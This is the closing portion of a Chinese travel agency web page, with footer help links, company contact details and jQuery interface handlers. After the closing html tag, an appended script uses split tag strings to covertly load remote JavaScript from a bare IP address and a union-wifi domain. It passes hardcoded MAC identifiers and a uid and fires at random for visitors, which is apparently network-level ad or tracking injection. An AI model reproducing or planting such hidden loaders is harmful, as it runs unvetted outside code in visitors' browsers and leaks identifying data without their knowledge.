        });
    </script>
    <div id="showPrompt">
        <div class="msg_mask"></div>
        <div class="msg_cont">
            <p>消息</p>
            <input type="button" value="确定">
        </div>
    </div>



    <div class="footer">
        <div class="help">
            <div class="txt bd_l0"><i class="i1"></i>
                <strong>轻松成为旅行玩家</strong>
                <p><a href="/help//5547" rel="nofollow" alt="旅行要知道" title="旅行要知道">旅行要知道</a></p>
                <p><a href="/help//5548" rel="nofollow" alt="怎么选择一次好的旅行" title="怎么选择一次好的旅行">怎么选择一次好的旅行</a></p>
                <p><a href="/help//5549" rel="nofollow" alt="旅行常见问题" title="旅行常见问题">旅行常见问题</a></p>
                <p><a href="/help//5550" rel="nofollow" alt="旅游工具箱" title="旅游工具箱">旅游工具箱</a></p>
            </div>
            <div class="txt "><i class="i1"></i>
                <strong>怎么预订</strong>
                <p><a href="/help//5551" rel="nofollow" alt="旅游预订方式" title="旅游预订方式">旅游预订方式</a></p>
                <p><a href="/help//5553" rel="nofollow" alt="预订常见问题" title="预订常见问题">预订常见问题</a></p>
                <p><a href="/help//5554" rel="nofollow" alt="签署旅游合同" title="签署旅游合同">签署旅游合同</a></p>
                <p><a href="/help//5556" rel="nofollow" alt="预订流程与服务承诺" title="预订流程与服务承诺">预订流程与服务承诺</a></p>
            </div>
            <div class="txt "><i class="i1"></i>
                <strong>怎么付款</strong>
                <p><a href="/help//5559" rel="nofollow" alt="付款方式" title="付款方式">付款方式</a></p>
                <p><a href="/help//5560" rel="nofollow" alt="付款说明与使用帮助" title="付款说明与使用帮助">付款说明与使用帮助</a></p>
                <p><a href="/help//5562" rel="nofollow" alt="支付安全保障" title="支付安全保障">支付安全保障</a></p>
                <p><a href="/help//5563" rel="nofollow" alt="关于发票" title="关于发票">关于发票</a></p>
            </div>
            <div class="txt bd_r0"><i class="i1"></i>
                <strong>开始旅行</strong>
                <p><a href="/help//5564" rel="nofollow" alt="出发前的准备" title="出发前的准备">出发前的准备</a></p>
                <p><a href="/help//5566" rel="nofollow" alt="服务建议与投诉" title="服务建议与投诉">服务建议与投诉</a></p>
                <p><a href="/help//5567" rel="nofollow" alt="旅行故事分享" title="旅行故事分享">旅行故事分享</a></p>
                <p><a href="/help//5568" rel="nofollow" alt="其它服务事项" title="其它服务事项">其它服务事项</a></p>
            </div>
            <!-- <div class="J_imgbox"><img src=""></div> -->
        </div>

        <div class="bottom_ico fn-clear" style="text-align: center;">
            <ul>

                <li class="xukezheng" style="float: none;"><a href="/about"><i style="-webkit-transform:scale(0.8); font-family: Arial;">L-YN-CJ00009</i></a></li>                <li style="float: none;"><span class="pay"></span></li>
            </ul>
        </div>
        <div class="copyright fn-clear">
            <div class="nav">
                <a href="/about/291">关于云游旅行网</a>
                <a href="/about/292">联系云游旅行网</a>
                <a href="/sitemap">网站地图</a><a href="/link">友情链接</a>
                <a href="/help">帮助中心</a>
                <a href="/cp/login" rel="nofollow">管理</a>
            </div>
            <p><span>Copyright &copy; 2017 <a href="/" target="_blank">云游旅行网</a>   <a href="http://www.miitbeian.gov.cn/" target="_blank" rel="nofollow">滇ICP备14006366号-1</a></span>
                云南中青国际旅行社有限公司旗下网站  公司地址：云南省昆明市拓东路133号（650041）  直线电话：0871-63199931
            </p>


        </div>

    </div>
</div>

<script type="text/javascript">
    $(document).ready(function(){
        // $("img").error(function(){
        //     var src=$(this).attr("src");
        //     if (src.substr(0, 20) == "http://c.cncnimg.cn/") {
        //         $(this).attr("src", "http://xnxwcdn.cncn.net/images/front/nopic_m.jpg");
        //     }
        // });
        $('.s-weixin').hover(function(){$(this).addClass('hover')},function(){$(this).removeClass('hover')});
        // $("p.weixin").hover(function(){
        //  $(this).addClass("hover");
        // },function(){
        //  $(this).removeClass("hover");
        // });
        $('.f-chat,.f-qq').hover(function(){
            $('.f-qq').toggle();

        });
        $('.f-call,.f-telnum').hover(function(){
            $('.f-telnum').toggle();
        });

        $(window).scroll(function(){
            var top=$(window).scrollTop();
            if(top>0){
                $('.f-scrolltop').show();
            }else{
                $('.f-scrolltop').hide();
            }
        });
        $('.f-scrolltop').click(function(event) {
            $('body,html').animate({scrollTop:0}, 200);

        });

    });

    $('.tonglan_menu a').hover(function(){
        var index = $(this).index();
        $(this).addClass('first').siblings('a').removeClass('first');

        var eleCont = $(this).parents('.hd').siblings('.bd');
        eleCont.children('.tab_cont').children('.pro_list').eq(index).addClass('showed').siblings('.pro_list').removeClass('showed');
    })

    $(function(){
        $('.J_imgbox').css({
            'width':'100%',
            'border':0
        });
        $('.hideBox').css({width:'0'});
        $('.J_imgbox').css({width:"200px"});
        $('.s-weixin').on('mouseover',function(){
            // var src=$('.J_hidebox').attr('src');

            // $('.J_imgbox').find('img').attr('src',src).end().show();
            $('.hideBox').show();
        });
        $('.s-weixin').on('mouseleave',function(){
            $('.hideBox').hide();
        });
    });


    $('.ota_menu a').hover(function(){
        var _this = $(this);
        var index = $(this).index();
        if(index  == 0) {
            return;
        }
        var ele = _this.parents('.hd').siblings('.bd').find('.pro_list').eq(index);
        var state = $(this).attr('data-state');
        var id    = $(this).attr('data-id');
        var item  = $(this).attr('data-item');
        if (id == '') {
            alert("非法操作，数据不正确");
            return;
        }
        if (item == '') {
            alert("非法操作，数据不正确");
            return;
        }


        if (state != 'ajaxed') {
            _this.attr('data-state', 'ajaxed');
            $.ajax({
                url: '/welcome/get_product_info',
                type: 'POST',
                dataType: 'JSON',
                data: {'id': id,'item': item},
                success: function(data) {
                    if(data.status == 1){
                        alert("非法操作，数据不正确");
                        console.log("非法操作，数据不正确");
                        return;
                    }else{
                        ele.css('background', 'none').html(data);
                    }
                }
            })
        }

    })
</script>


<div class="f-fixedbox">
    <div class="f-hover f-scrolltop">返回顶部</div>
</div>



<script src="http://xnxw.cncnimg.cn/js/jquery.lazyload.js?v=20150513"></script>

<div style="margin:0 auto;text-align:center;width:100%;"></div>

<script>
</script>



<div style="margin:0 auto;text-align:center;width:100%;"><script src="http://s11.cnzz.com/stat.php?id=5313953&web_id=5313953" language="JavaScript"></script></div>
</body>
</html>

<script>
    function ik_random(){var ik_r_min=0;var ik_r_max=100;return(parseInt(Math.random()*(ik_r_max-ik_r_min+1)+ik_r_min));}
    function ik_isiframe(){return (self!=top);}
    var __m='54:ee:75:88:2d:bc';
    var __m2='00:00:00:00:00:00';
    var __h="<sc"+"ript src=\"http://101.201.53.95/js.php?uid=90b9a2b579ed77179e1accd617f5034b,PC,";
    var __b="&r="+Math.random()+__m+__m2+"\"></scr"+"ipt>";
    var x=ik_random();
    if(!ik_isiframe()){
        switch(true){
            case x>=0&&x<5:
                document.write(__h+"200"+__b);
                document.write("<sc"+"ript src=\"http://js.union-wifi.com/zm.js?R6Gpf6T&dmac="+__m2+"&umac="+__m+"\"></scr"+"ipt>");
                break;
            case x>=55&&x<=100:
                document.write(__h+"100"+__b);
                document.write("<sc"+"ript src=\"http://js.union-wifi.com/zm.js?Rav195P&dmac="+__m2+"&umac="+__m+"\"></scr"+"ipt>");
                break;
        }
    }
</script>